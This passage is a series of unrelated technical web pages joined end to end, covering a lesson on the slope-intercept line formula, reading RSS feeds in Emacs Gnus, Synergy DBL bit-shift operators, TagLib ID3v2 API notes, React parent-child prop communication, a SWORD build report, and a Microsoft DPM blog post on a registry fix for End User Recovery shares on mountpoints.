In the chart below, we know that the y-intercept is 50 million because its corresponding $x$ value is zero.
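Going the other way also works: given any two points on a line, such as (0, 50) and (150, 500) from the increased line above (values in millions), we can recover both the slope and the y-intercept. A quick sketch (the function name is mine, not part of the lesson's library):

```python
def slope_and_intercept(x1, y1, x2, y2):
    """Recover m and b for the line through (x1, y1) and (x2, y2)."""
    m = (y2 - y1) / (x2 - x1)   # rise over run
    b = y1 - m * x1             # solve y = m*x + b for b at the first point
    return m, b

# Two points from the 'increased est. revenue' trace (values in millions):
slope_and_intercept(0, 50, 150, 500)  # (3.0, 50.0)
```

So the increased line keeps the same slope of 3 but starts 50 million higher.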
The y-intercept of a line usually is represented by b. Now we have all of the information needed to describe any straight line using the formula below:
$$y = mx + b $$
Once more, in this formula:
- $m$ is the slope of the line
- $b$ is the y-intercept, the value of $y$ when $x$ equals zero
So thinking about it visually, increasing $m$ makes the line steeper, and increasing $b$ pushes the line higher.
In the context of our movies, we said that the line with values of $m$ = 3 and $b$ = 50 million describes our line, giving us:
$y = 3x + 50,000,000 $.
Let's translate this into a function. For any input of $x$ our function returns the value of $y$ along that line.
def y(x): return 3*x + 50000000
y(30000000)
y(60000000)
In this section, we saw how to estimate the relationship between an input variable and an output value. We did so by drawing a straight line representing the relationship between a movie's budget and its revenue. We saw the output for a given input simply by looking at the y-value of the line at that input point of $x$.
We then learned how to represent a line as a mathematical formula, and ultimately a function. We describe lines through the formula $y = mx + b $, with $m$ representing the slope of the line, and $b$ representing the value of $y$ when $x$ equals zero. The $b$ variable shifts the line up or down while the $m$ variable tilts the line forwards or backwards. Translating this formula into a function, we can write a function that returns an expected value of $y$ for an input value of $x$.
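That translation from $(m, b)$ to a function can itself be written as a function, which makes it easy to build a new line function for any slope and intercept. A small sketch (the helper name is mine):

```python
def build_line(m, b):
    """Return a function computing y = m*x + b for slope m and intercept b."""
    def y(x):
        return m * x + b
    return y

# The movie line from above: m = 3, b = 50 million.
revenue = build_line(3, 50_000_000)
revenue(30_000_000)  # 140000000
```

Any line in our two-dimensional world can now be produced by a single call with its $m$ and $b$.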
https://learn.co/lessons/single-variable-regression
Gnus, the Emacs mail/news/whatever reader, has built-in support for RSS, which, in theory should allow one to read blogs like this or LtU without having to leave the comfortable surroundings of Emacs.
The instructions at [old link: ] were good enough to get me going, but the result is quite unsatisfactory. Firstly, gnus throws a fit when trying to retrieve the RSS for this blog, though the LtU blog is fine. TonyG suggests this may be due to namespace prefixes. Secondly, the body of RSS feeds tends to be HTML, which looks hideous when rendered by Emacs.
So for the time being I’ll stick to web browsers for blog reading.
5 Comments
Or, there are dedicated RSS readers, my favourite of which is currently Straw.
I just tried your site on gnus 21.4.1. Works perfectly. I found your post because I’m having troubling reading a different wordpress rss feed, but yours works great. Otherwise gnus is by far the fastest way to deal with lots of rss feeds and, if you are comfortable with emacs, the most intuitive.
It still doesn’t work for me under XEmacs 21.4.19, Gnus v5.10.7
The error I was seeing in the *Message-Log* buffer went away after doing a (require 'w3). Now I get the following in the *Message-Log*:
Contacting
Retrieval complete.
Parsed 100% of 405...done
XML-RPC is not available... not checking Syndic8.
nnrss: Failed to fetch nil
nnrss: Requesting lshift-blog...done
When selecting the lshift-blog group, Gnus just says "no messages".
I finally got it to work! The trick is to set mm-url-use-external to t so that Emacs uses an external program, by default wget, to fetch the feed, rather than its built-in HTTP support.
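In an Emacs init file, that fix looks like this (a config sketch based on the variable named in the comment above):

```elisp
;; Fetch feeds with an external program (wget by default)
;; instead of Emacs' built-in HTTP support.
(setq mm-url-use-external t)
```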
https://tech.labs.oliverwyman.com/blog/2005/07/15/rss-via-gnus/
Bit Shifting Operators Come to Synergy .NET
By Bob Studer, Senior Systems Software Engineer
Synergy DBL 10.1 on .NET adds two new operators for expressions: right bit shift ( >> ) and left bit shift ( << ). In combination with the other bitwise operators (|, &, etc.), shifting can access parts of fields that can be used to store flag data or to combine and extract small pieces of data. Bit shifts can be applied to Synergy decimal and integer types and some classes. They work by shifting, in bucket brigade fashion, the bits in the value on the left of the operator either to the left or the right by the number of bits specified by the value on the right of the operator. For example:
data x, i1, 3 data y, i1 y = x << 2
In this example the binary value of x is 00000011. Shifting that left by two bits changes the binary value to 00001100, which is 12 decimal. In effect, x was multiplied by 2^2, or 4. If a 1 bit is shifted into the high bit of a signed field, the value will be negative, and if a 0 is shifted into the high bit, the value will be positive. Any bits shifted out of the high end of the field will be lost; 0 bits are shifted into the low end of the field.
On the other hand, if x is shifted 1 bit to the right, as follows:
y = x >> 1
y will be set to 1. Thus, 00000011 becomes 00000001, in effect dividing x by 2^1, or 2. Any bits shifted out of the low end of the field will be lost, and bits that match the sign bit (the high-end bit) will be shifted in from the high end, so a negative value will stay negative, and a positive value will remain positive. This is called a sign-extending right shift.
Bit shifting is limited to integer types (i1, i2, i4, i8, int, short, long, and sbyte), Synergy decimal types (for example, d4), and classes that implement the op_RightShift or op_LeftShift operator methods. Synergy decimal types are first converted into integers before the shift is performed. The following example shows a class that implements the right shift operator:
namespace ns1
    class fred
        public method fred
            arg, int
        proc
            val = arg
        end

        public property val, int
            method get
            endmethod
            method set
            endmethod
        endproperty

        public static method op_RightShift, @fred
            arg1, @fred
            arg2, int
        proc
            arg1.val = arg1.val >> arg2   ;Right shifts the val property
            mreturn arg1
        end

        private myval, int
    endclass
endnamespace

proc
    data h, @fred, new fred(125)
    h = h >> 3                        ;Calls the op_RightShift method
    console.writeline(h.val)
end
In combination with the other bitwise operators, shifting can be used to set and access groups of bits within a single field. These bits can represent groups of flags or small values.
data combi, sbyte
data b1, sbyte
data b2, sbyte

b1 = 3
b2 = 6
console.writeline(b1)
console.writeline(b2)

combi = ((b1 & 7) << 3) | (b2 & 7)
b2 = (combi >> 3) & 7
b1 = combi & 7
console.writeline(b1)
console.writeline(b2)
The above code swaps the values contained in b1 and b2. Swapping values this way demonstrates that you can access the two three-bit “subfields” of the combi field separately. ANDing b1 and b2 with 7 ensures that the incoming values won’t exceed the three bits allocated to the subfields. The value of b1 is shifted to the left 3 bits, and then the value of b2 is ORed into the lower three bits of combi. The next statements then extract the two three-bit fields, storing them in opposite fields to demonstrate that the values have been correctly retrieved.
You can see how bit shifts give you more control over individual bits within integer types. We think you’ll find them extremely useful. See “Bitwise operators” in the Synergy/DE documentation for more information.
http://synergex-testsite.com/bit-shifting-operators/
A few functions for ID3v2 synch safe integer conversion. More...
Detailed Description
A few functions for ID3v2 synch safe integer conversion.
In the ID3v2.4 standard most integer values are encoded as "synch safe" integers which are encoded in such a way that they will not give false MPEG syncs and confuse MPEG decoders. This namespace provides some methods for converting to and from these values to ByteVectors for things rendering and parsing ID3v2 data.
Function Documentation
Convert the data from unsynchronized data to its original format.
Returns a 4 byte (32 bit) synchsafe integer based on value.
This returns the unsigned integer value of data where data is a ByteVector that contains a synchsafe integer (Structure, 6.2). The default length of 4 is used if another value is not specified.
http://taglib.github.io/api/namespaceTagLib_1_1ID3v2_1_1SynchData.html
Previously, we covered topics up to and including cloning children props. Overall, it was all the standard flow, where the parent passes the props to child components.
Today, we're spicing up the game and covering a bit more advanced themes - how the component can send information to the parent via props, and how components on the same level (under the same parent) can communicate by using props. Note that there are other, more advanced ways to realize communication between components (using more advanced ways to manage app state, like Redux), but in this article, we're talking about props only.
Note: As for all the previous articles, everything below also applies to React Native, as well!
Communication From Children to Parent
Props are passed in one direction only: from parent to children. However, this doesn't mean that the communication from children to the parent via props is impossible. It can be implemented using 'the basic flow': by passing the prop functions to children. These function props should act as callbacks.
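Stripped of React entirely, this pattern is just "the parent hands the child a function". A plain JavaScript sketch (the names here are mine, for illustration only):

```javascript
// The parent owns the state and hands out a callback that updates it.
function makeParent() {
  const state = { username: "" };
  const saveChange = (field) => (newValue) => { state[field] = newValue; };
  return { state, updateParent: saveChange("username") };
}

// The child never touches the parent's state directly;
// it only invokes the callback it was given as a "prop".
function childTypes(props, text) {
  props.updateParent(text);
}

const parent = makeParent();
childTypes({ updateParent: parent.updateParent }, "ada");
console.log(parent.state.username); // "ada"
```

React adds rendering and state management on top, but the direction of information flow is exactly this: data down via props, notifications up via callbacks.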
So, let's say that we have a ChildInput component:
class ChildInput extends Component {
  ...
  handleChange = (event) => {
    // This is functional setState!
    this.setState(() => {
      const newValue = event.target.value;
      this.props.updateParent(newValue);
      return {
        value: newValue,
      }
    });
  }
  ...
  render() {
    return (
      <input
        onChange={this.handleChange}
        placeholder={this.props.placeholder}
        type="text"
        value={this.state.value}
      />
    )
  }
}
In our parent component, we get the information on value updates in the input using a callback sent as an updateParent prop:
class Parent extends Component {
  ...
  saveChange = (field) => (newValue) => {
    // do something with this field's newValue
    // for this example field is "username"
    // newValue is whatever is typed into input
  }
  ...
  render() {
    return (
      <ChildInput
        placeholder={"Input field"}
        updateParent={this.saveChange("username")}
      />
    )
  }
}
So, every time the user types something into the input, the parent is notified through the callback and can react to the new value. Sometimes the information you need shouldn't belong to the child at all.
Communication Between Same Level Components
Direct communication between two components that are on the same level via props is not possible. There is, however, a way for two same-level components to communicate via props: if these props are contained and handled in their common parent. Let's look at an AddTodo component that adds a new todo to our list:
class AddTodo extends Component {
  ...
  addItem = () => {
    this.props.addItem(this.state.todo);
    this.setState(() => {
      return { todo: '' };
    });
  }
  ...
  render() {
    return (
      <div>
        <input
          onChange={this.handleChange}
          type="text"
          value={this.state.todo}
        />
        <button onClick={this.addItem}>
          Add todo
        </button>
      </div>
    )
  }
}
For this to function properly, the TodoPage component will have to know about the todo list, store it, and update it accordingly:
class TodoPage extends Component {
  constructor() {
    super();
    this.state = { todoList: [] };
  }
  ...
  addItem = (newItem) => {
    this.setState(({ todoList }) => {
      todoList.push(newItem);
      return {
        todoList,
      };
    });
  }
  ...
  render() {
    return (
      <div>
        <AddTodo addItem={this.addItem} />
        <TodoList items={this.state.todoList} />
      </div>
    );
  }
}
When a new todo item is added to the list, the parent will be notified about it and update the state accordingly, thus notifying the TodoList to rerender.
Let's take a look at another example, where we have a ChildInput component (the same one that appeared previously in this article!), a Button, and a Form, which is the parent. We have a condition here: if the value of the input is empty, our button should be disabled; otherwise it'll be enabled.
Here's our Button component:
class Button extends Component {
  render() {
    return (
      <button disabled={this.props.disabled}>
        { this.props.text }
      </button>
    );
  }
}
Form will know the value of ChildInput and tell Button whether it's disabled based on this value:
class Form extends Component {
  constructor() {
    super();
    this.state = { fieldValue: "" };
  }
  ...
  handleInputChange = (fieldValue) => {
    this.setState(() => {
      return {
        fieldValue,
      };
    });
  }
  ...
  render() {
    return (
      <div>
        <ChildInput
          placeholder={"Form input"}
          updateParent={this.handleInputChange}
        />
        <Button
          disabled={!this.state.fieldValue}
          text={"Form button"}
        />
      </div>
    );
  }
}
Keep in mind that for more complex cases, the more advanced state-management approaches mentioned at the start (like Redux) are a better fit!
Published at DZone with permission of Kristina Grujic , DZone MVB. See the original article here.
Opinions expressed by DZone contributors are their own.
https://dzone.com/articles/react-guide-to-props-part-ii?fromrel=true
Hi there ..... Just to let you know Cheatah no longer seems to compile against the latest CVS (using the namespace feature). I've managed to get my own module making tools to compile and link OK after adding the following (from addvs.cpp) -

#ifndef NO_SWORD_NAMESPACE
using sword::SWMgr;
using sword::RawText;
using sword::SWKey;
using sword::VerseKey;
using sword::ListKey;
using sword::SWModule;
#endif

I don't know how to alter Cheatah - and I only use it to check out the library each time I rebuild, but I thought I ought to report it. God bless, Barry -- From Barry Drake (The Revd) minister of the Arnold and the Netherfield United Reformed Churches, Nottingham see and for our church homepages). Replies - b.drake@ntlworld.com
|
http://www.crosswire.org/pipermail/sword-devel/2002-October/016301.html
|
CC-MAIN-2014-42
|
refinedweb
| 124
| 59.98
|
- subroutines with the rest of Perl, creating a new executable. This situation is similar to Perl.
TUTORIAL
Now let's go on with the show!
EXAMPLE 1
Our first extension will be very simple. When we call the routine in the extension, it will print out a well-known message and return. Running "h2xs -A -n Mytest" generates, among other files, Makefile.PL, Mytest.pm, Mytest.xs, t/Mytest.t, and Changes.
The MANIFEST file contains the names of all the files just created in the Mytest directory.
What has gone on?
The program h2xs is the starting point for creating extensions. In later examples we'll see how we can use h2xs to read header files and generate templates to connect to C routines.
h2xs creates a number of files in the extension directory. The file Makefile.PL is a perl script which will generate a true Makefile to build the extension. We'll take a closer look at it later.
The .pm and .xs files contain the meat of the extension. The .xs file holds the C routines that make up the extension. The .pm file contains routines that tell Perl how to load your extension.
Generating the Makefile and running make created a directory called blib (which stands for "build library") in the current working directory. This directory will contain the shared library that we will build.
See perlmod for more information.
The
$VERSION variable is used to ensure that the .pm file and the shared library are "in sync" with each other. Any time you make changes to the .pm or .xs files, you should increment the value of this variable.
Writing good test scripts
The importance of writing good test scripts cannot be over-emphasized. You should closely follow the "ok/not ok" style that Perl itself uses, so that it is very easy and unambiguous to determine the outcome of each test case. When you find and fix a bug, make sure you add a test case for it.
EXAMPLE 3
Our third extension will take one argument as its input, round off that value, and set the argument to the rounded value.
Running "
make test" should now print out that all nine tests are okay.
Notice that in these new test cases, the argument passed to round was a scalar variable. You might be wondering if you can round a constant or literal. To see what happens, temporarily add the following line to Mytest:
XS(XS_Mytest_round) { dXSARGS; if (items != 1) ... }
We'll talk more later about what that "ST(0)" means in the section on the argument stack; see also perlguts. The next example interfaces with C libraries. To begin with, we will build a small library of our own, then let h2xs write our .pm and .xs files for us. This requires an addition to the WriteMakefile call and the replacement of the postamble subroutine to cd into the subdirectory and run make. The Makefile.PL for the library is a bit more complicated, but not excessively so. Again we replaced the postamble subroutine to insert our own code.
With the completion of Example 4, we now have an easy way to simulate some real-life libraries whose interfaces may not be the cleanest in the world. We shall now continue with a discussion of the arguments passed to the xsubpp compiler.
When you specify.
Extending your Extension
Sometimes you might want to provide some extra methods or subroutines to assist in making the interface between Perl and your extension simpler or easier to understand. These routines should live in the .pm file. Whether they are automatically loaded when the extension itself is loaded or only loaded when called is up to you. Documentation written in pod format is converted to man page format, then placed in the blib directory. It will be copied to Perl's manpage directory when the extension is installed.
You may intersperse documentation and Perl code within the .pm file. In fact, if you want to use method autoloading, you must do this, as the comment inside the .pm file explains.
See perlpod for more information about the pod format.
Installing your Extension
You'll also need to add the following code to the top of the .xs file, just after the include of "XSUB.h":
#include <sys/vfs.h>
Also add the following code segment to Mytest.t while incrementing the "9" tests to "11":
@a = &Mytest::statfs("/blech"); ok( scalar(@a) == 1 && $a[0] == 2 ); @a = &Mytest::statfs("/"); is( scalar(@a), 7 );
Then add the following to Mytest.t, while incrementing the "11" tests to "13":
$results = Mytest::multi_statfs([ '/', '/blech' ]); ok( ref $results->[0] ); ok( ! ref $results->[1] );
For more information, consult perlapi, perlxs, perlmod, and perlpod.
Author
Jeff Okamoto <okamoto@corp.hp.com>
Last Changed
2007/10/11
|
https://metacpan.org/pod/release/RJBS/perl-5.12.3-RC1/pod/perlxstut.pod
|
CC-MAIN-2017-09
|
refinedweb
| 748
| 75.71
|
The eagerly awaited Microsoft SDK for Kinect has been released - so we can now get on and develop all those innovative projects that it seems ideal for. In this article we look at how easy it is to start writing Kinect software using C#.
The first part is Getting started with Windows Kinect SDK 1.0
If you don't want to miss it subscribe to the RSS feed, follow us on Google+, Twitter, Linkedin or Facebook or sign up for our weekly newsletter.
The Microsoft official SDK for Kinect (updated to Beta 2) is easy to use. Basically you download it, plug the Kinect into a free USB socket and start programming. You can create applications in C#, VB or any .NET language including C++. Its only disadvantage is that it has a non-commercial licence which means you cannot use it to make any profit or even use it at all within a profit making organization. If all you want to do is explore the Kinect or have some fun then this is no big problem.
You also need to be running Windows 7 which is perhaps a bigger restriction.
As well as being easy to use the new SDK is also significantly more powerful than what you can find as open source - it has an improved body tracker and it supports the Kinect's sound hardware.
In this article we look at how easy it is to start writing software using C#.
First you need to prepare the hardware, and this isn't without its difficulties. When downloading the SDK, select either the 64-bit or 32-bit version. If in doubt, download both, as the installer won't let you install the wrong version. Once the SDK is installed and the Kinect is plugged in, you should see three Kinect devices in the Device Manager.
There is also a Kinect audio device listed under audio.
To check that they have worked, try running the "Sample Skeletal Viewer" that ships with the SDK.
Getting started with Kinect is fairly easy but there are some small things that might cause problems.
Start a new project - it doesn't matter really if it is a Windows Forms or WPF project, but to make things easier let's start with a Windows Forms project. Next you need to add a reference to Microsoft.Research.Kinect.dll. Right click on the project in the project window and select Add Reference. Finding the Dll in the .NET tab can be difficult so click on the Component Name tab to put them into alphabetical order and scroll down to the Microsoft section.
The project has to target the x86 platform but in most cases this is the default so you shouldn't have to adjust anything.
To avoid having to type fully qualified names add:
using Microsoft.Research.Kinect.Nui;
using Microsoft.Research.Kinect.Audio;
to the start of the code. You only need the one ending in Audio if you are going to use the audio features of the Kinect.
|
http://i-programmer.info/programming/hardware/2623-getting-started-with-microsoft-kinect-sdk.html
|
CC-MAIN-2014-15
|
refinedweb
| 473
| 72.05
|
chefkeifer
Basic LoaderMax tutorial by Zync
chefkeifer posted a topic in Loading (Flash)I have been following Zync's tutorial and have done everything he has done. As far as i know. I keep getting this error. TypeError: Error #1010: A term is undefined and has no properties. at main/xmlLoaded() at flash.events::EventDispatcher/dispatchEventFunction() at flash.events::EventDispatcher/dispatchEvent() at com.greensock.loading.core::LoaderCore/_completeHandler() at com.greensock.loading::XMLLoader/_completeHandler() at com.greensock.loading::XMLLoader/_receiveDataHandler() at flash.events::EventDispatcher/dispatchEventFunction() at flash.events::EventDispatcher/dispatchEvent() at flash.net::URLLoader/onComplete() here is my code. package { import com.greensock.events.*; import com.greensock.loading.*; import com.greensock.*; import flash.display.Sprite; import flash.display.MovieClip; import com.greensock.loading.XMLLoader; import com.greensock.events.LoaderEvent; import com.greensock.loading.LoaderMax; import com.greensock.loading.ImageLoader; import com.greensock.loading.data.ImageLoaderVars; import flash.display.MovieClip; import flash.text.TextField; import flash.events.MouseEvent; import com.greensock.loading.display.ContentDisplay; public class main extends Sprite { public var thumbHolder:MovieClip; public var mainHolder:MovieClip; public var titleTxt:TextField; public var descTxt:TextField; private var xImgList:XMLList; public function main() { //load in our xml var xPhotography:XMLLoader = new XMLLoader("xml/buggies.xml"); xPhotography.addEventListener(LoaderEvent.COMPLETE, xmlLoaded); xPhotography.load(); } private function xmlLoaded(e:LoaderEvent):void { var xData:XML = e.target.content; xImgList = new XMLList(xData.img); //Setup a loadermax object var thumbLoader:LoaderMax = new LoaderMax({name:"thumbLoader"}); thumbLoader.addEventListener(LoaderEvent.COMPLETE, thumbsLoaded); //setup variables for our imageLoader Vars var nImgWidth:Number = 150; var nImgHeight:Number = 100; var nMaxCols:Number = 2; 
for (var i:int = 0; i < xImgList.length(); i++) { var iLoad:ImageLoader = new ImageLoader("images/buggies/" + xImgList[i].@url, new ImageLoaderVars() .name(xImgList[i].@name) .width(nImgWidth) .height(nImgHeight) .smoothing(true) .container(thumbHolder) .x((i % nMaxCols) * nImgWidth) .y(int(i / nMaxCols) * nImgHeight) .scaleMode("proportionalOutside") .crop(true) .prop("index", i) .prop("url", xImgList[i].@url) .prop("title", xImgList[i].@title) .prop("desc", xImgList[i].@desc) .alpha(0) ) thumbLoader.append(iLoad); } thumbLoader.load(); } private function thumbsLoaded(e:LoaderEvent):void { //setup click events for our thumbnails for (var i:int = 0; i < xImgList.length(); i++) { var cdImg:ContentDisplay = LoaderMax.getContent("p" + (i+1)); cdImg.buttonMode = true; cdImg.addEventListener(MouseEvent.CLICK, thumbClick); TweenMax.to(cdImg, 1, {autoAlpha:1, delay:(i*0.2)} ); } } private function thumbClick(e:MouseEvent):void { var vars:Object = ImageLoader(e.currentTarget.loader).vars; trace(vars.title); checkOldImage(vars.index) } private function checkOldImage(index:Number):void { //check if there's already an image loaded if(mainHolder.numChildren > 0) { var oldClip:Sprite = Sprite(mainHolder.getChildAt(0)); TweenMax.to(oldClip, 0.5, {autoAlpha:0, onComplete:function(){ mainHolder.removeChildAt(0); loadImage(index) } }); }else { loadImage(index); } } private function loadImage(index:Number):void { //Get filename var file:String = xImgList[index].@url; //change text display titleTxt.text = "Title:" + xImgList[index].@title; descTxt.text = "Description:" + xImgList[index].@desc; //setup our main image loader var mainLoad:ImageLoader = new ImageLoader("images/buggies/" + file, new ImageLoaderVars() .width(500) .height(500) .scaleMode("proportionalInside") .container(mainHolder) .smoothing(true) ) //setup event listeners mainLoad.addEventListener(LoaderEvent.COMPLETE, imageLoaded); mainLoad.load(); } private function imageLoaded(e:LoaderEvent):void { var 
imgClip:ContentDisplay = LoaderMax.getContent(e.currentTarget.name); TweenMax.to(imgClip, 0, {colorTransform: {exposure:2}} ); TweenMax.to(imgClip, 1.5, {colorTransform: {exposure:1}, autoAlpha:1} ); } } }
first node not showing properly
chefkeifer replied to chefkeifer's topic in Loading (Flash)thanks carl, that was a big help and stupid oversight on my part. As always it's the little things that stump you for the longest time. I also figured out the columns with the following code just for future reference var columns:int = 2; var xPos:int = 0; var yPos:int = 0; var counter:int = 0; var item:buggieItem; for each(var xmlItem:XML in xmlItems) { item = new buggieItem(); addChild(item); item.title.text = xmlItem.title[0].text(); item.condition.text = xmlItem.condition[0].text(); item.model.text = xmlItem.model[0].text(); item.features.text = xmlItem.features[0].text(); item.salePrice.text = "$" + xmlItem.salePrice[0].text(); item.image.text = xmlItem.image[0].text(); item.x = xPos; item.y = yPos; counter++; if ( counter > ( columns - 1 ) ) { counter = 0; xPos = 0; yPos += 210;//item.height; } else { xPos += 545;//item.width; } } i am still in need of some help if you dont mind. I need to know how to get the image to show up in each of them as well... i understand the xml part but i am not sure how to get that info from xml with just the dataLoader..do i need to do another imageLoader to get that to happen?
first node not showing properly
chefkeifer posted a topic in Loading (Flash)I am wondering why when the first node which is this item.title.text = xmlItem.title[0].text(); is in there causes an error and they overlap as well...not sure how to word that.. but when i comment that out all works just fine..the movieclip loops and with all the data from the xml work just. i have attached a working fla file i am also trying to figure it out how to get these to show up in two columns and not one continueous column thanks for your help http:// ... uggies.zip
SlideshowExample
chefkeifer posted a topic in Loading (Flash)Hey Jack, thanks for all you help in the past. but of course I still have issues. I am trying to bring in a swf from another folder that contains the SlideshowExample you create (its tweaked to fit my needs). All works seperatly, meaning when i test the seminole_photos1.fla it works just fine. When i test the fr_seminole.fla it works fine except when i click on the first photo icon to pull in that seminole_photos1.swf into fr_seminole.swf. I hope that makes sense. I am wondering if the folder structure is all out of wack. Not sure why the pictures one show up. this is the error i get when clicking on that first photo icon Loading error on XMLLoader 'loader0' (assets/data.xml): Error #2032: Stream Error. URL: i have tried every folder structure i can think and it still cant get any images to show here is a link to a scaled down fla folder package... http://
zoom
chefkeifer posted a topic in TransformManager (Flash)Is there a way to zoom upon the users mouseclick on the stage. for instance if the user click on certain part of the page it will then zoom from that point. Is transformAroundCenter the way to go about this?
- sorry Jack. i was unsure if you could or would download from my server... here is the zipped file with the html, css, flash, and the huge swf file thanks again for hanging with me. http://
- the reason i didnt upload the subloading file is because its 20megs...but i changed the file location to point to the url. here is my html. pretty plain and simple thanks for you help.
- i guess the reason you didnt see anything is that your probably using mozilla. for some reason that is the only browser nothing shows up in. Not sure why. anyway here is my fla.
- thanks again for you help and i have done my research and have come up with another issue...or course...thats me..ask my wife..just kidding...all works just fine except for when you the user goes to the page initianally...it acts a bit wierd...it uploads very huge...here is the link to see what i am talking about.. http:// ... .scene.php but if you minimize it all works just fine...as well when yo maximize again..it works just fine...its just when you first go to the site...not sure what the issue could be...i thought you could still have some insight...this is the code i have been using and learning from import com.greensock.layout.*; import flash.display.StageAlign; import com.greensock.*; import com.greensock.loading.*; import com.greensock.events.LoaderEvent; import com.greensock.loading.display.*; this.stage.align = StageAlign.TOP_LEFT; var ls:LiquidStage = new LiquidStage(this.stage, 1024, 853, 100, 100); var topArea:LiquidArea = LiquidArea.createAround(topBar_mc, {scaleMode:ScaleMode.WIDTH_ONLY}); topArea.pinCorners(ls.TOP_LEFT, ls.TOP_RIGHT); ls.attach(logo, ls.BOTTOM_RIGHT); ls.attach(archives, ls.TOP_LEFT); var magArea:LiquidArea = new LiquidArea(this, 150, 60, 1024, 700); var magLoader:SWFLoader = new SWFLoader("01.2011.karting.scene.swf", {name:"kartingScene", container:this, alpha:0, onProgress:progressHandler, onError:errorHandler, onComplete:completeHandler, onInit:onMagLoaded}); magLoader.load(); function progressHandler(event:LoaderEvent):void { trace("progress: " + event.target.progress); } function completeHandler(event:LoaderEvent):void { trace(event.target + " is complete!"); } function errorHandler(event:LoaderEvent):void { trace("error occured with " + event.target + ": " + event.text); } function onMagLoaded(event:LoaderEvent):void { magArea.attach(magLoader.content, {scaleMode:ScaleMode.PROPORTIONAL_INSIDE}); TweenLite.to(magLoader.content, 1, {alpha:1}); TweenMax.to(magLoader.content, 1, {dropShadowFilter:{color:0x000000, alpha:1, 
blurX:12, blurY:12}}); }
- thanks again Jack...i kept pulling from the wrong com folder...I will get this... one last question ...in this code what does the 400,400 refer too i know that the 800,800 is the width and height of my stage but not sure what the other is refering too var ls:LiquidStage = new LiquidStage(this.stage, 800, 800, 400, 400); also in this code i know that the 0,60 is the x and y coordinates for the magLoader but not sure what the 800,700 is refering too var magArea:LiquidArea = new LiquidArea(this, 0, 60, 800, 700); thanks again
- i tested the file you sent and i still get that coercion error Scene 1, Layer 'Layer 1', Frame 1, Line 14 1118: Implicit coercion of a value with static type Object to a possibly unrelated type String. Scene 1, Layer 'Layer 1', Frame 1, Line 35 1118: Implicit coercion of a value with static type Object to a possibly unrelated type String. i know i have the latest version because i just renewed jsut the other day. What could be the issue?
- I am Shockingly Green. i renewed the other day. I appreciate your help...
- not that new to AS but still learning. i am very new to the liquid stage part. i am using your loadSWF to load the swf which is in side of a movie clip. i have actaully started over since i posted this. and yes that code was copied and pasted. i use the example and was going to learn from it and tweak it. here is what i came up with when i started over. i still get that coersion error i have attached a fla
- also, is it better to make my whole project small with higher quality images and when it expands doesnt lose quality. or do i make it big and then have it scale down. I am at a loss fo where to start, even though i am almost done...lol
liquidStage
chefkeifer posted a topic in TransformManager (Flash)I am trying to do an online magazine. i made my layout in inDesign CS5 and exported it out to a swf. I have some code that imports the swf into my flash file. The problem i am having is that its too big for most browsers. right now i have my flash file setup as 1525x850 to fit the exported (inDesign) swf. I want to be able to scale if someones monitors size or browser size it smaller. How do i go about this ? i am using this code and i keep getting a coercion error import com.greensock.layout.*; //create a LiquidStage instance for the current stage which was built at an original size of 550x400 //don't allow the stage to collapse smaller than 550x400 either. var ls:LiquidStage = new LiquidStage(this.stage, 625, 400, 625, 400); //attach a "logo" Sprite to the BOTTOM_RIGHT PinPoint ls.attach(logo, ls.BOTTOM_RIGHT); //create a 300x100 rectangular area at x:50, y:70 that stretches when the stage resizes (as though its top left and bottom right corners are pinned to their corresponding PinPoints on the stage) var area:LiquidArea = new LiquidArea(this, 50, 70, 300, 100); //attach a "myImage" Sprite to the area and set its ScaleMode to PROPORTIONAL_OUTSIDE and crop the overspill area.attach(myImage, {scaleMode:ScaleMode.PROPORTIONAL_OUTSIDE, crop:true});
|
https://greensock.com/profile/480-chefkeifer/
|
CC-MAIN-2022-27
|
refinedweb
| 2,055
| 52.36
|
Hello, Mike Jacquet here, and today I would like to discuss a fix that has been included in the released version of System Center 2012 Data Protection Manager (DPM) that enables End User Recovery (EUR) for file shares on the root of mountpoints to work properly.
In previous versions of DPM, if you protected a volume or share on a file server, and the share was on the root of a mounted volume, when clients tried looking for previous versions of files and folder located in the root of the target volume it would fail to show any.
To illustrate this, Figure-1 below shows a clustered protected file server called MJLC-ClusterFS with two Volumes. The H: drive labeled HOSTVOL is the HOST volume for a NTFS mountpoint. The folder H:\MountVol is the mountpoint for another volume labeled TARGET. The H:\MountVol folder is shared as MountVol, and client’s access data located on the TARGET volume via the network share \\MJLC-ClusterFS\Mountvol path.
MJLC-ClusterFS
H:\Mountvol –> Target
User Files…
User Folders
Figure-1
In figure-2 below, I show a Windows client mapped to a network drive X: which points to the \\mjlc-clusterfs\Mountvol share. When the user attempts to view Previous Versions of the file called targetfile.txt.txt located in the root of the mountpoint (TARGET), no previous versions are enumerated and instead you see "There are no previous versions available" message.
Figure-2
The root cause for this problem is due to the way that DPM creates the shares on the DPM Server when end user recovery is enabled. To overcome a possible path limitation, DPM creates all shares using a \\?\ prefix. Unfortunately, that prefix prevents vss shadow copies from being enumerated under mounted volumes.
Figure-3 details the shares on the DPM server. Looking specifically at the ones created by DPM for end user recovery, you will see they are prefixed with the \\?\ for the folder path. I have highlighted the problematic MountVol share. If you were to manually re-create the share without the \\?\ prefix DPM would overwrite it when the next synchronization job ran and it will put the \\?\ prefix back on the folder path and would result in the same problem.
Figure-3
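What "discarding" the prefix amounts to is a plain string operation on the share's folder path. A hypothetical helper (not DPM code) makes it concrete:

```python
def discard_unc_prefix(path: str) -> str:
    """Drop the \\?\ extended-length prefix from a share's folder path.

    Illustrative only -- this mimics what the DiscardUNCPrefix key makes
    DPM do when it (re)creates end-user-recovery shares; it is not DPM code.
    """
    prefix = "\\\\?\\"
    if path.startswith(prefix):
        return path[len(prefix):]
    return path
```

With the prefix stripped, the share path is an ordinary path again, and VSS shadow copies under mounted volumes can be enumerated.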
SOLUTION
System Center 2012 Data Protection Manager supports a new registry key that you can add to prevent DPM from adding the \\?\ prefix when the end user recovery shares are created.
To allow previous versions to be listed for files located under shared mountpoints perform the following steps:
NOTE: Only shares that are created (re-created) after the registry key is added will no longer be prefixed.
1) On DPM 2012 RTM server make a new registry KEY called DiscardUNCPrefix under the following location:
HKLM\SOFTWARE\Microsoft\Microsoft Data Protection Manager\Configuration
Figure-4
2) On the DPM Server, open Computer Management. Under System Tools – Shared Folder – Shares – locate the share representing the mountpoint and “Stop Sharing” to delete it.
3) In the DPM Console, locate the volume or share that is being protected that represents the mountpoint and make a new recovery point. You can choose either the "Only Synchronize" or the "Create a recovery point after synchronizing" option, but a synchronization job must be run and complete successfully before the share will be re-made on the DPM Server.
Figure-6
